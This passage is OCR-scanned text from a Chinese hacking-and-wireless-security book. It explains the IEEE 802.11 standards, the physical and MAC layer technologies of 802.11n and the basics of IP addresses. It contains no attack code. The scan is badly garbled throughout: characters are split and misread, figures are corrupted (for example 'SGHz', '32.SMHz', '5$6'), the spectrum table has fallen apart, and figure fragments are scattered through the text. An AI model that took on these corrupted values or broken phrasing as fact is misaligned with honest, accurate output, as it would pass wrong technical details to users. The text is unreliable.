一 个 中 距离 圆 形 轨道 卫星 导航 系统 。 它 可 
以 为 地 球 表面 绝 大 部 分 地 区 (98%) 提供 准 
确 的 定位 、 测 速 和 高 精度 的 时 间 标 准 。 


1.6 “小 试 身 手 


练习 1: 认识 无 线路 由 器 。 
练习 2: 查看 网 卡 的 实体 结构 。 
练习 3: 查看 天 线 的 实体 结构 。 


第 2 童 ” 无 线 网 络 攻防 必 备 知识 


作为 无 线 网 络 中 的 计算 机 或 终端 设备 用 户 ， 要 想 使 自己 的 设备 不 受 或 少 受 黑客 的 攻 
击 ， 就 必须 了 解 一 些 黑客 常用 的 入 侵 手 段 以 及 学 习 一 些 无 线 网 络 安全 方面 的 基础 知识 ， 本 
章 介 绍 有 关 这 方面 的 内 容 ， 如 无 线 网 络 的 协议 标准 、802.11n 协 议 的 关键 技术 、IP 地 址 、 


MAC 地 址 、 端 口 以 及 黑客 常用 的 DOS 命 令 等 。 


2.1 无 线 网 络 协议 标准 


无 线 局 域 网 络 (Wireless Local Area Net- 
works，WLAN) 利用 射频 (Radio Frequen- 
cy，RF) 或 是 红外 线 (InfraRed，IR) 的 技 
术 ， 以 无 线 的 方式 连接 两 部 或 多 部 需要 交换 
数据 的 计算 机 设备 ， 利 用 无 线 的 高 移动 性 来 
应 用 于 各 个 需要 的 应 用 领域 之 中 。 

无 线 网 络 的 通信 协议 标准 为 IEEE 802.11 
协议 族 ， 主 要 包括 IEEE 802.11、IEEE 
802.11b、 IEEE 802.11a、 IEEE 802.11g、 
IEEE 802.11n 等 。 其 中 ，IEEE 802.11n 是 在 
IEEE 802.11g 和 IEEE 802.11a 之 上 发 展 起 来 


的 一 项 技术 ， 最 大 的 特点 是 速率 提升 ， 理 
论 速率 最 高 可 达 600Mb/s， 而 目前 业界 主流 
为 300Mb/s。 下 图 为 IEEE 802.11 协 议 族 相 互 
之 间 的 关系 。 


)2.11/11a/11b/119g MA 


Be 


B802.11a(54 Mbps) 


IEEE 802.11 协 议 族 各 个 协议 发 布 的 时 
间 以 及 使 用 频率 等 信息 见 下 表 。 


表 802.11 协 议 族 的 详细 信息 


IEEE 802.11 IEEE 802.11b IEEE 802.11a IEEE 802.11g 


标准 发 布 时 间 
合法 频率 


频率 范围 


非 重 登 信 道 
调制 技术 


Bf 1999.9 1999.9 2003.6 
83.3MHz 83.5MHz 32.SMHz 83.SMHz 


3.130 一 9.330GHz 
2.400 一 2.483GHz | 2.400 一 2.483GHz 

$.725~5.8S0GHz 
FHSS/DSSS CCK/DSSS OFDM CCK/OFDM 


6, 9, 12, 18, 24, 
1,2 ls 25 3.35 1l 
36，48，34 


2.400 一 2.483GHz 


0，9，12，18，24， 
36，48，34 


理论 上 UDP 吞吐 

i 的 最 大 和 1.7Mb/s 7.1Mb/s 30.9Mb/s 30.9Mb/s 
量 (1500 byte) 

理论 上 的 最 大 TCP/IP 夺 1.6Mb/s $5.9Mb/s 24.4Mb/s 24.4Mb/s 
吐 量 (1500 byte) 


兼容 性 
无 线 履 盖 范 围 


与 11g 可 互通 与 11b/g 不 能 互通 与 11b 可 互通 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈 超 值 版 ) 


IEEE 802.11 
IEEE 802.11 是 无 线 局 域 网 通用 的 标 


和 准 ， 它 是 由 IEEE 所 定义 的 无 线 网 络 通信 的 


标准 。 虽 然 WiFi 使 用 了 IEEE 802.11 的 媒体 
访问 控制 层 (MAC) 和 物理 层 (PHY) ， 
但 是 两 者 并 不 完全 一 致 。 

IEEE 802.11 采 用 2.4GHz 和 SGHz 这 两 个 
ISM 频 段 。 其 中 2.4GHz 的 ISM 频 段 被 世界 
上 绝 大 多 数 国家 采用 ，5GHz ISM 频 段 在 一 
些 国 家 和 地 区 的 使 用 情况 比较 复杂 ， 加 上 
高 载波 频率 所 带 来 了 负面 效果 ， 使 得 IEEE 
802.11 的 普及 受到 了 限制 ， 即 使 它 是 协议 
组 的 原始 标准 。 


IEEE 802.11a 是 IEEE 802.11 原 始 标 准 的 


”第 一 个 修订 标准 ， 于 1999 年 9 月 获得 批准 。 


IEEE 802.11a 标 准 采 用 了 与 原始 标准 相同 的 
核心 协议 ， 工 作 频 率 为 SGHz， 最 大 原始 数 
据 传 输 率 为 54Mb/s， 达 到 了 现实 网 络 中 等 
吞吐 量 (20Mb/s) 的 要 求 。 

IEEE 802.11a 的 传输 技术 为 多 载波 调 
制 技术 ， 被 广泛 应 用 在 办 公 室 、 家 庭 、 宾 
馆 、 机 场 等 众多 场合 。 它 工作 在 SGHzU- 
NII 频 带 ， 物 理 层 速率 可 达 54Mb/s， 传 输 
层 可 达 25Mb/s， 可 提供 25Mb/s 的 无 线 ATM 
接口 和 10Mb/s 的 以 太 网 无 线 帧 结构 接口 ， 
以 及 TDD/TDMA 的 空中 接口 ; 支持 语音 、 
数据 、 图 像 业 务 ; 一 个 履 区 可 接 入 多 个 用 
户 ， 每 个 用 户 可 带 多 个 用 户 终 端 。 

由 于 2.4GHz 频 带 已 经 被 广泛 使 用 ， 采 
用 SGHz 的 频带 让 IEEE 802.11a 具 有 更 少 冲突 
的 优点 。 然 而 ， 高 载波 频率 也 带 来 了 负面 效 
果 。IEEE 802.11a 几 乎 被 限制 在 直线 范围 内 
使 用 ， 这 导致 必须 使 用 更 多 的 接 入 点 ;同样 
还 意味 着 IEEE 802.11a 的 传播 范围 不 大 。 


2.1.3 IEEE 802.11b 


IEEE 802.11b 的 出 现 是 为 了 解决 传输 速 


率 低 的 问题 ， 如 以 前 无 线 局 域 网 的 速率 只 
有 1 一 2Mb/s， 而 许多 应 用 也 是 根据 10Mbys 
以 太 网 速率 设计 的 ， 限 制 了 无 线 产品 的 应 
用 种 类 。IEEE 802.11b 从 根本 上 改变 了 无 线 
局 域 网 的 设计 和 应 用 现状 。 

1. IEEE 802.11b 标 准 简 介 


IEEE 802.11b 无 线 局 域 网 的 带宽 最 高 可 
达 11Mb/s， 比 IEEE 802.11 标 准 快 5 倍 ， 扩 大 
了 无 线 局 域 网 的 应 用 领域 。 另 外 也 可 根据 
实际 情况 采用 5.5Mb/s、2 Mb/s 和 1 Mb/s 带 
宽 ， 实 际 的 工作 速度 在 SMb/s 左 右 ， 与 普通 
的 10Base-T 规 格 有 线 局 域 网 几乎 是 处 于 同一 
水 平 。 作 为 公司 内 部 的 设施 ， 可 以 基本 满 
足 使 用 要 求 。IEEE 802.11b 使 用 的 是 开放 的 
2.4GHz 上 频段， 不 需要 申请 就 可 使 用 。 既 可 
作为 对 有 线 网 络 的 补充 ， 也 可 独立 组 网 ， 
从 而 使 网 络 用 户 摆脱 网 线 的 束缚 ， 实 现 真 
正 意义 上 的 移动 应 用 。 

2. IEEE 802.11b 优 点 


IEEE 802.11b 具 有 如 下 优点 : 

(1) 使 用 范围 。IEEE 802.11b 支 持 以 
百 米 为 单位 的 范围 (在 室外 为 300m; 在 办 
公 环 境 中 最 长 为 100m) 。 

(2) 可 靠 性 。 与 以 太 网 类 似 的 连接 协 
议和 数据 包 确 认 ， 来 提供 可 靠 的 数据 传送 
和 网 络 带 宽 的 有 效 使 用 。 

(3) 互 用 性 。 与 以 前 的 标准 不 同 的 
是 ，IEEE 802.11b 只 人 允许 一 种 标准 的 信号 发 
送 技术 ， 产 品 的 互 用 性 较 强 。 

(4) 电源 管理 。IEEE 802.11b 提 供 了 
网 卡 休眠 模式 ， 访 问 点 将 信息 缓冲 到 AP 
端 ， 延 长 了 电池 的 寿命 。 

(5) 漫游 文 持 。 当 用 户 在 楼 房 或 公司 
部 门 之 间 移 动 时 ， 人 允许 在 访问 点 之 间 进 行 

3. IEEE 802.11b 运 作 模 式 

IEEE 802.11b 运 作 模 式 基 本 分 为 两 种 : 
点 对 点 模式 和 基本 模式 。 下 面 进行 详细 介绍 : 


(1) 点 对 点 模式 ， 是 指 无 线 网 卡 和 无 线 
网 卡 之 间 的 通信 方式 ， 只 要 PC 插 上 无 线 网 
卡 即 可 与 男 一 台 具 有 无 线 网 卡 的 PC 连接 ， 
对 于 小 型 的 无 线 网 络 来 说 ， 是 一 种 方便 的 
连接 方式 ， 最 多 可 连接 256 台 PC。 

(2) 基本 模式 ， 是 指 无 线 网 络 规模 扩 
充 或 无 线 和 有 线 网 络 并 存 时 的 通信 方式 ， 
这 是 IEEE 802.11b 最 常用 的 方式 。 此 时 ， 
插 上 无 线 网 卡 的 PC 需要 由 接 入 点 与 另 一 
台 PC 连接 ， 接 入 点 负责 频段 管理 及 漫游 等 
指挥 工作 ， 一 个 接 入 点 最 多 可 连接 1024 台 
PC 〈 无 线 网 卡 ) 。 


4. IEEE 802.11b 的 典型 解决 方案 


IEEE 802.11b 无 线 局 域 网 由 于 其 便利 性 
和 可 伸缩 性 ， 特 别 适 用 于 小 型 办 公 环 境 和 
家 庭 网 络 。 在 室内 环境 中 ， 针 对 不 同 的 实 
际 情况 可 以 有 不 同 的 解决 方案 。 

(1) 对 等 解决 方案 。 对 等 解决 方案 是 一 
种 最 简单 的 应 用 方案 ， 只 要 给 每 台 计 算 机 安 
装 一 片 无 线 网 卡 ， 即 可 相互 访问 。 如 果 需 要 
与 有 线 网 络 连接 ， 可 以 为 其 中 一 台 计 算 机 再 
安装 一 片 有 线 网 卡 ， 无 线 网 中 其 余 计算 机 即 
利用 这 人 台 计 算 机 作为 网 关 ， 访 问 有 线 网 络 或 
共享 打印 机 等 设备 。 

但 对 等 解决 方案 是 一 种 点 对 点 方案 ， 
网 络 中 的 计算 机 只 能 一 对 一 互相 传递 信 
轧 ， 而 不 能 同时 进行 多 点 访问 。 如 果 要 实 
现 与 有 线 局 域 网 一 样 的 互通 功能 ， 则 必须 
音 助 接 入 点 。 

(2) 单 接 入 点 解决 方案 。 接 入 点 相当 
于 有 线 网 络 中 的 集线器 。 无 线 接 入 点 可 以 
连接 周边 的 无 线 网 络 终端 ， 形 成 星 型 网 
络 结构 ， 同 时 通过 10Base-T 端口 与 有 线 网 
络 相 连 ， 使 整个 无 线 网 的 终端 都 能 访问 有 
线 网 络 的 资源 ， 并 可 通过 路 由 器 访问 外 部 
网 络 。 


2.1.4 |EEE 802.11g 
与 之 前 的 IEEE 802.11 协 议 标 准 相 比 ， 
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IEEE 802.11g 草 案 有 以 下 两 个 特点 : 一 是 在 
2.4GHz 频 段 使 用 正 交 频 分 复 用 (OFDM) 
调制 技术 ， 使 数据 传输 速率 提高 到 20Mb/s 以 
上 ; 二 是 能 够 与 IEEE 802.11b 的 WiFi 系 统 互 
联 互 通 ， 可 共存 于 同一 AP 的 网 络 里 ， 从 而 
保障 了 后 向 兼容 性 。 这 样 原 有 的 WLAN 系 
统 可 以 平滑 地 向 高 速 WLAN 过 渡 ， 延 长 了 
IEEE 802.11b 产 品 的 使 用 寿命 ， 从 而 降低 
了 用 户 的 投资 。 

IEEE 802.11g 的 物理 帧 结构 分 为 前 导 信 
号 (Preamble) 、 信 头 Header 和 负载 Pay- 
load。Preamble 主 要 用 于 确定 STA 和 AP 之 间 
何 时 发 送 和 接收 数据 ， 传 输 进 行 时 告知 其 
他 STA 以 免 冲突 ， 同 时 传送 同步 信号 及 帧 间 
隔 。Preamble 完 成 后 ， 接 收 方才 开始 接收 数 
据 。Header 在 Preamble 之 后 ， 用 来 传输 一 些 
重要 的 数据 ， 例 如 负载 长 度 、 传 输 速率 、 
服务 等 信息 。 由 于 数据 率 及 要 传送 字 节 的 
数量 不 同 ，Payload 的 包 长 变化 很 大 ， 可 以 
十 分 短 也 可 以 十 分 长 。 在 一 帧 信号 的 传输 
过 程 中 ，Preamble 和 Header 所 占 的 传输 时 
间 越 多 ，Payload 用 的 传输 时 间 就 越 少 ， 传 
输 的 效率 就 越 低 。 

综合 上 述 3 种 调制 技术 的 特点 ，IEEE 
802.11g 采 用 了 OFDM 等 关键 技术 来 保障 
其 优越 的 性 能 ， 分 别 对 Preamble、Header、 
Payload 进 行 调 制 ， 这 种 帧 结构 称 为 OFDM/ 
OFDM 方 式 。IEEE 802.11g 兼 容 性 指 的 是 
IEEE 802.11g 设 备 能 和 IEEE 802.11b 设 备 
在 同一 个 AP 节 点 网 络 里 互联 互通 。IEEE 
802.11g 的 一 个 最 大 特点 就 是 要 保障 与 IEEE 
802.11bWiFi 系 统 兼容 ，IEEE 802.11g 可 以 
接收 OFDM 和 CCK 数 据 ， 但 传统 的 WiFi 
系统 只 能 接收 CCK 人 信息， 这 就 产生 了 一 
个 问题 ， 即 在 两 者 共存 的 环境 中 如 何 解 
决 由 于 IEEE 802.11b 不 能 解 调 OFDM 格 式 
信息 帧 头 所 带 来 的 神 突 问题 ， 而 为 了 解决 


上 述 问 题 ，IEEE 802.11g 采 用 了 RTS/CTS wm; 


技术 。 
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mam 2.1.9 IEEE 802.11n 
er 后 
a a 

SR IEEE 802.11n 是 在 IEEE 802.11g 和 IEEE 


“802.11a 的 基础 上 发 展 起 来 的 一 项 技术 ， 


最 大 的 特点 是 速率 提升 ， 理 论 速率 最 高 可 
达 600Mb/s( 目 前 业界 主流 为 300Mb/s) ， 
IEEE 802.11n 可 工作 在 2.4GHz 和 5GHz 两 个 
频段 。 

IEEE 802.11n 对 用 户 应 用 的 男 一 个 重要 
好 处 是 无 线 履 盖 的 改善 。 由 于 采用 了 多 天 
线 技 术 ， 无 线 信 号 〈 对 应 同一 条 信道 ) 将 
通过 多 条 路 径 从 发 射 端 到 接收 端 ， 从 而 提 
供 了 分 集 效应 。 

另外 ， 除 了 吞吐 和 帮 盖 的 改善 ，IEEE 
802.11n 技 术 还 有 一 个 重要 的 功能 就 是 要 兼 
容 传统 的 IEEE 802.11 a/b/g， 以 保证 现 有 网 
络 的 运行 。 


2.2 IEEE 802.11n 协 议 的 关键 
技术 


IEEE 802.11n 主 要 是 结合 物理 层 和 
MAC 层 的 优化 来 充分 提高 WLAN 技 术 的 
否 吐 。 主 要 的 物理 层 技术 涉及 了 MIMO、 
MIMO-OFDM、40MHz、Short GI 等 技术 ， 
从 而 将 物理 层 吞 吐 提高 到 600Mby/s。 


MIMO 主 要 有 如 下 的 典型 应 用 ， 包 括 : 

(1) 提高 吞吐 。 通 过 增加 多 通道 ， 并 
发 传 传递 数据 ， 可 以 成 倍 提高 系统 吞吐 。 

(2) 提高 无 线 链 路 的 健壮 性 和 改善 接 
收 端的 SNR。 通 过 多 条 通道 ， 无 线 信 号 通 
过 多 条 路 径 从 发 射 端 到 达 接 收 端 多 个 接收 
天 线 。 由 于 经 过 多 条 路 径 传播 ， 多 条 路 径 
不 会 同时 出 现 严重 衰竭 ， 采 用 某 种 算法 把 
这 些 多 个 信号 进行 综合 计算 ， 可 以 改善 接 
收 端 的 SNR。 需 要 注意 的 是 ， 这 里 是 同一 
条 数据 在 多 个 路 径 上 传递 了 多 份 ， 并 不 能 
够 提高 否 吐 。 

2. SDM 

当 基 于 MIMO 同 时 传递 多 条 独立 信道 
(spatial streams) ， 下 图 为 通过 MIMO 传 递 
多 条 信道 的 示意 图 ， 信 道 X1、X2 进 行 传递 
时 ， 将 成 倍 地 提高 系统 的 吞吐 。 


物理 层 关 键 技术 
IEEE 802.11n 中 涉及 的 物理 层 关 键 技 术 


er 


0 国 
py | 下 下 和 


2.2.1 


rr 

可 由 
四 
. 


MIMO 系 统 文 持 信道 的 数量 取决 于 发 


, rh [: 


包括 MIMO、SDM、MIMO-OFDM、FEC、 
Short Guard Interval、40MHz 绑 定 技 术 、 
MCS、MRC 等 ， 下 面 进行 详细 介绍 。 


1. MIMO 


MIMO 是 IEEE 802.11n 物 理 层 的 核心 ， 
指 的 是 一 个 系统 采用 多 个 天 线 进行 无 线 信 
号 的 收发 。 右 上 图 为 MIMO 的 架构 示意 图 。 
它 是 当今 无 线 最 热门 的 技术 ， 无 论 是 4G、 
IEEE 802.16e WIMAX， 还 是 IEEE 802.11n， 
都 把 MIMO 列 入 射频 的 关键 技术 。 
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送 天 线 和 接收 天 线 的 最 小 值 。 如 发 送 天 线 
数量 为 3， 而 接收 天 线 数量 为 2， 则 支持 的 
信道 为 2。MIMO/SDM 系 统一 般 用 “发 射 天 
线 数量 X 接收 天 线 数量 ”表示 。 如 上 图 为 
2X2 MIMO/SDM 系 统 。 显 然 ， 增 加 天 线 可 
以 提高 MIMO 支 持 的 信道 数 。 但 是 综合 成 
本 、 实 际 效 果 等 多 方面 因素 ， 目 前 业界 的 
WLAN AP 都 普遍 采用 3X3 的 模式 。 
MIMO/SDM 是 在 发 射 端 和 接收 端 之 
间 ， 通 过 存在 的 多 条 路 径 〈 通 道 ) 来 同时 
传播 多 条 流 。 一 直 以 来 ， 无 线 技术 《如 


OFMD ) 总 是 企图 克服 多 径 效应 的 影响 ， 而 
MIMO 恰 恰 是 在 利用 多 径 来 传输 数据 ， 下 图 
为 MIMO 利 用 多 路 径 传 输 数 据 示意 图 。 


3. MIMO-OFDM 


在 室内 等 典型 应 用 环境 下 ， 由 于 多 径 
效应 的 影响 ， 信 号 在 接收 端 很 容易 发 生 符 
号 间 干 扰 (ISI) ， 从 而 导致 丢 包 率 增 高 。 
OFDM 调 制 技术 是 将 一 个 物理 信道 划分 为 多 
个 子 载体 (sub-carrier) ， 将 高 速率 的 信道 
调制 成 多 个 较 低 速率 的 子 信 道 ， 通 过 这 些 
子 载 体 进行 通信 ， 从 而 减少 ISI 机 会 ， 提 高 
物理 层 吞 吐 。 

OFDM 在 IEEE 802.11a/g 时 代 已 经 成 熟 
使 用 ， 到 了 IEEE 802.11n 时 代 ， 它 将 MIMO 
支持 的 子 载体 从 52 个 提高 到 5$6 个 。 需 要 注 
意 的 是 ， 无 论 IEEE 802.11a/g， 还 是 IEEE 
802.11n， 它 们 都 使 用 了 4 个 子 载体 作为 
pilot 子 载体 ， 而 这 些 子 载体 并 不 用 于 数据 
的 传递 。 所 以 IEEE 802.11n MIMO 将 物理 
速率 从 传统 的 54Mb/s 提 高 到 58.5Mb/s〔( 即 
54X52/48) 。 


4. FEC (Forward Error Correction) 


按照 无 线 通 信 的 基本 原理 ， 为 了 使 信 
息 适 合 在 无 线 信道 这 样 不 可 靠 的 媒介 中 传 
递 ， 发 射 端 将 把 信息 进行 编码 并 携带 元 余 
信息 ， 以 提高 系统 的 纠 错 能 力 ， 使 接收 端 
能 够 恢复 原始 信息 。IEEE 802.11n 所 采用 的 
QAM-64 编 码 机 制 可 以 将 编码 率 (有效 信 
息 和 整个 编码 的 比率 ) 从 3/4 提高 到 5/6。 
所 以 ， 对 于 一 条 信道 ， 在 MIMO-OFDM 基 
础 之 上 ， 物 理 速 率 从 58.5Mb/s 提 高 到 65Mb/s 
( 即 58.5X5/6 二 3/4) 。 右 图 为 改变 数据 排 
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序 示 意图 ， 改 变数 据 的 摆 列 方式 由 原先 的 
圆 形 数据 改 为 方形 数据 ， 这 样 使 得 空间 利 
用 更 加 合理 。 


5. Short Guard Interval 〈GI) 


由 于 多 径 效应 的 影响 ， 信 息 符 号 
(Information Symbol) 将 通过 多 条 路 径 传 
递 ， 可 能 会 发 生 彼此 碰撞 ， 导 致 ISI 干 扰 。 
为 此 ，IEEE 802.11a/g 标 准 要 求 在 发 送信 
息 符 号 时 ， 必 须 保证 在 信息 符号 之 间 存 在 
800 ns 的 时 间 间 隔 ， 这 个 间隔 被 称 为 Guard 
Interval (GI) 。IEEE 802.11n 仍 然 使 用 默认 
的 800 ns GI。 当 多 径 效 应 不 是 很 严重 时 ， 
用 户 可 以 将 该 间隔 配置 为 400， 对 于 一 条 信 
道 ， 可 以 将 吞吐 提高 近 10%， 即 从 6SMby/s 
提高 到 72.2Mb/s。 对 于 多 径 效应 较 明 显 的 环 
境 ， 不 建议 使 用 Short Guard Interval (GI) 。 


6. 40MHz 绑 定 技术 


这 个 技术 最 为 直观 : 对 于 无 线 技术 ， 
提高 所 用 频谱 的 宽度 ， 可 以 最 为 直接 地 提 
高 否 吐 。 就 好 比 是 宽松 的 河道 ， 水 流通 过 
率 自然 提高 。 传 统 IEEE 802.11a/g 使 用 的 频 
宽 是 20MHz， 而 IEEE 802.11n 支 持 将 相 邻 两 
个 频 宽 绑 定 为 40MHz 来 使 用 ， 所 以 可 以 最 
直接 地 提高 吞吐 。 

需要 注意 的 是 : 对 于 一 条 信道 ， 并 不 
仅仅 是 将 吞吐 从 72.2 Mb/s 提 高 到 144.4〔 即 
72.2X2) Mb/s。 对 于 20MHz 频 宽 ， 为 了 减 
少 相 邻 信 道 的 和 干扰， 在 其 两 侧 预 留 了 一 人 小 
部 分 的 带宽 边界 ， 通 过 40MHz 绑 定 技 术 ， 
这 些 预 留 的 带宽 也 可 以 用 来 通信 ， 可 以 将 
子 载体 从 104 (52X2) 提高 到 108Mb/s。 按 
照 72.2X2X108/104 进 行 计 算 ， 所 得 到 的 吞 
吐 能 力 达 到 了 150Mb/s。 
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7. MCS (Modulation Coding Scheme) 


在 IEEE 802.11a/b/g 时 代 ， 配 置 AP 工 作 的 速率 非常 简单 ， 只 要 指定 特定 radio 类 型 


《802.11a/b/g) 所 使 用 的 速率 集 ， 速 率 范 围 从 1Mb/s 到 5$4Mby/s， 


率 ， 见 下 表 。 


一 共有 12 种 可 能 的 物理 速 


表 配置 AP 工作 速率 表 


传输 速率 (Mb/s) 
40MHz 带 宽 


一 op 一 
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中 
"YH 
UA 
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到 了 IEEE 802.11n 时 代 ， 由 于 物理 速 
率 依赖 于 调制 方法 、 编 码 率 、 信 道 数量 、 
是 否 40MHz 绑 定 等 多 个 因素 。 这 些 影 啊 吞 
吐 的 因素 组 合 在 一 起 ， 将 产生 非常 多 的 物 
理 速率 供 选 择 使 用 。 比 如 基于 Short GTL， 
40MHz 绑 定 等 技术 ， 在 4 条 信道 的 条 件 下 ， 
物理 速率 可 以 达到 600Mb/s 〈 即 4X150) 。 
为 此 ，IEEE 802.11n 提 出 了 MCS 的 概念 。 
MCS 可 以 理解 为 这 些 影响 速率 因素 的 完整 
组 合 ， 每 种 组 合用 整数 来 唯一 标示 。 对 于 
AP、MCS 普 遍 文 持 的 范围 为 0 一 15。 


8. MRC (Maximal-Ratio Combining ) 
MRC 和 吞吐 提高 没有 任何 关系 ， 它 的 
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目的 是 改善 接收 端的 信号 质量 。 基 本 原理 
是 : 对 于 来 自发 射 问 的 同一 个 信号 ， 由 于 
在 接收 端 使 用 多 天 线 接收 ， 那 么 这 个 信号 
将 经 过 多 条 路 径 〈 多 个 天 线 ) 被 接收 端 所 
接收 。 多 个 路 径 质量 同时 差 的 概率 非常 小 ， 
一 般 总 有 一 条 路 径 的 信号 较 好 。 那 么 在 接收 
端 可 以 使 用 茶 种 算法 ， 对 各 条 接收 路 径 上 的 
言 号 进行 加 权 汇 总 (显然 ， 信 号 最 好 的 路 
径 分 配 最 高 的 权重 ) ， 实 现 接收 端的 信号 改 
善 。 当 多 条 路 径 上 信号 都 不 太 好 时 ， 仍 然 通 
过 MRC 技 术 获 得 较 好 的 接收 信号 。 


2.2.2 MAC 层 关键 技术 
MAC 层 的 技术 主要 针对 帧 聚合 技术 、 


Block ACK 以 及 兼容 IEEE 802.11a/b/g 
协议 ， 其 中 ， 帧 聚合 包含 针对 MSDUDU 的 
聚合 (A-MSDU ) 和 针对 MPDU 的 聚合 
(A-MPDU) 。 


1. A-MSDU 


A-MSDU 技 术 是 指 把 多 个 MSDU 通 过 一 
定 的 方式 聚合 成 一 个 较 大 的 载荷 。 下 图 为 
A-MSDU 结 构 示 意图 ， 这 里 的 MSDU 可 以 认 
为 是 以 太 网 报 文 。 


A-MSDU , 

通 音 当 AP 或 无 线 客户 端 从 协议 栈 收 到 
报 文 (MSDU) 时 ， 会 打上 以 太 网 报 文 头 ， 
它 被 称 为 A-MSDU Subframe; 而 在 通过 
射频 口 发 送出 去 前 ， 需 要 一 一 将 其 转换 成 
802.11 报 文 格式 。 而 A-MDSU 技 术 则 在 将 若 
干 个 A-MSDU Subframe 聚 合 到 一 起 ， 并 封 
装 为 一 个 802.11 报 文 进 行 发 送 。 从 而 减少 了 
发 送 每 一 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header 和 802.11 MAC 头 的 开销 ， 
同时 减少 了 应 答 帧 的 数量 ， 提 高 了 报 文 发 

A-MSDU 报 文 是 由 知 干 个 A-MSDTU 
Subframe 组 成 的 ， 每 个 Subframe 均 是 由 
Subframe header (Ethernet Header) 、 一 个 
MSDU 和 0 一 3 字 节 的 填充 组 成 。 

MSDU 技 术 只 适用 于 所 有 MSDU 的 目的 
端 为 同一 个 HT STA 的 情况 。 


2.A-MPDU 


与 A-MSDU 不 同 的 是 ，A-MPDU 聚 合 
是 经 过 802.11 报 文 封装 后 的 MPDU， 这 里 的 
MPDU 是 指 经 过 802.11 封 装 过 的 数据 帧 ， 右 
图 为 A-MPDU 结 构 示 意图 。 
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通过 一 次 性 发 送 右 和 干 个 MPDU， 减 少 
了 发 送 每 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header， 从 而 提高 系统 吞吐 量 。 

其 中 MPDU 格 式 和 802.11 定 义 的 相同 ， 
而 MPDU Delimiter 是 为 了 使 用 A-MPDU 而 定 
义 的 新 的 格式 。A-MPDU 技 术 同 样 只 适用 
于 所 有 MPDU 的 目的 端 为 同一 个 HT STA 的 
情况 。 


3. Block ACK 


为 保证 数据 传输 的 可 靠 性 ，IEEE 802.11 
协议 规定 每 收 到 一 个 单 播 数 据 帧 ， 都 必须 立 
即 回应 以 ACK 帧 。A-MPDU 的 接收 端 在 收 
到 A-MPDU 后 ， 需 要 对 其 中 的 每 一 个 MPDU 
进行 处 理 ， 因 此 同样 针对 每 一 个 MPDU 发 送 
应 答 帧 。Block Acknowledgement 通 过 使 用 
一 个 ACK 帧 来 完成 对 多 个 MPDU 的 应 答 ， 
以 降低 这 种 情况 下 的 ACK 帧 的 数量 。 

Block Ack 机 制 分 三 个 步骤 来 实现 : 

(1) 通过 ADDBA Request/Response 报 
文 协商 建立 Block ACK 协 定 。 

(2) 协商 完成 后 ， 发 送 方 可 以 发 送 有 
限 多 个 QoS 数据 报 文 ， 接 收 方 会 保留 这 些 数 
据 报 文 的 接收 状态 ， 待 收 到 发 送 方 的 Block- 
AckReq 报 文 后 ， 接 收 方 则 回应 以 BlockAck 
报 文 来 对 之 前 接收 到 的 多 个 数据 报 文 做 一 
次 性 回复 。 

(3) 通过 DELBA Request 报 文 来 撤销 
一 个 已 经 建立 的 Block Ack 协 定 。 


1] > 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈《 超 值 版 ) 


4. 兼容 802.11a/b/g 


WLAN 标 准 从 802.11a/b 发 展 到 
802.11g， 再 到 现在 的 802.11n， 提 供 良 好 的 
向 后 兼容 性 是 非常 重要 的 。802.11g 提 供 了 
:@ 一 套 保护 机 制 来 允许 802.11b 的 无 线 用 户 接 


全 入 802.11g 网 络 。 同 样 地 ，802.11n 协 议 提供 
职守 相似 的 机 制 来 允许 802.11a/b/g 用 户 的 接 入 。 


802.11n 设 备 发 送 的 信号 可 能 无 法 被 
802.11a/b/g 的 设备 解析 到 ， 造 成 802.11a/ 
b/g 设备 无 法 探测 到 802.11n 设 备 ， 从 而 往 
空中 直接 发 送信 和 号， 导致 信 道 使 用 上 的 冲 
突 。 为 解决 这 个 问题 ， 当 802.11n 运 行 在 泥 
合 模式 〈 即 同时 有 802.11a/by/g 设 备 在 网 络 
中 ) 时 ， 会 在 发 送 的 报 文 头 前 添加 能 够 被 
802.11a 或 802.11b/g 设 备 正 确 解析 的 前 导 码 。 
从 而 保证 802.11a/b/g 设 备 能 够 侦 听 到 802.1ln 
信号 ， 并 启用 冲突 避免 机 制 ， 进 而 实现 
802.11n 的 设备 与 802.11a/b/g 设 备 的 互通 。 

802.11n 向 下 兼容 802.11a/g，802.11a/g 
的 终端 接 入 802.11n 网 络 后 ， 由 于 MIMO 技 
术 提 高 了 SNR， 因 此 802.11av/g 的 网 络 最 大 香 
吐 量 54Mb/s 范 围 有 所 扩大 。 同 时 802.11n 的 
网 络 性 在 802.11a/g 终 端 和 802.11n 终 端 混合 
接 入 时 ， 网 络 整体 吞吐 量 较 纯 802.11n 终 端 
接 入 有 一 定 的 下 降 ， 此 时 802.11n 终 端的 速 
率 还 是 高 于 802.11a/g 的 终端 性 能 。 


5. MIMO 技 术 


MIMO 是 802.11n 物 理 层 的 核心 ， 通 过 
结合 40MHz 绑 定 、MIMO-OFDM 等 多 项 技 
术 ， 可 以 将 物理 层 速率 提高 到 600Mb/s。 为 
了 充分 发 挥 物 理 层 的 能 力 ，802.11n 对 MAC 
层 采 用 了 帧 聚合 、Block ACK 等 多 项 技术 进 
行 优 化 。802.11n 带 来 大 吞吐 、 广 覆盖 等 提 
高 的 同时 ， 也 增加 了 更 多 的 技术 挑战 。 了 
解 这 些 技术 ， 将 有 助 于 更 好 地 应 用 802.11n 


和 解决 应 用 所 面临 的 实际 问题 。 
2.3 ” IP 地址 
在 无 线 网 络 中 ， 一 台 主 机 对 应 一 个 IP 


地 址 ， 因 此 ， 黑 客 要 想 攻 击 某 台 主 机 ， 只 
须 找 到 这 人 台 主 机 的 卫 地 址 ， 然 后 进行 入 侵 攻 
击 即 可 ， 可 以 说 IP 地 址 是 黑客 实施 入 侵 攻 击 
的 “门牌 号 ”。 


2.3.1 认识 IP 地 址 


IP 地 址 用 于 在 TCP/IP 通 信 协 议 中 标 
记 每 台 计 算 机 的 地 址 ， 通 常 使 用 十 进 制 
来 表示 ， 如 192.168.1.100， 但 在 计算 机 内 
部 ，IP 地 址 是 一 个 32 位 的 二 进 制 数值 ， 
如 11000000 10101000 00000001 00000110 
(192.168.1.6) 。 

一 个 完整 的 IP 地 址 由 两 部 分 组 成 ， 分 
别 是 网 络 号 和 主机 号 。 网 络 号 表示 其 所 属 
